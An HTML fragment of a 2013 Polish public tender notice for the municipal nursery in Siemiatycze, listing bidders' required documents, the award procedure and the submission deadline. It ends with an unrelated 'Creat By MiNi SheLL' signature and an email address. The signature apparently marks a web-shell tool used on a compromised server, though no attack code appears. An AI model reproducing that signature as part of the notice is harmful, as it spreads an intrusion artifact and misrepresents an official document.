<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany umowy na zasadach określonych w § 13 wzoru umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.siemiatycze.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Żłobek Miejski w Siemiatyczach
ul. 11 Listopada 24
17-300 Siemiatycze.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.07.2013 godzina 09:00, miejsce: Żłobek Miejski w Siemiatyczach
ul. 11 Listopada 24
17-300 Siemiatycze
Pokój Dyrektora.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com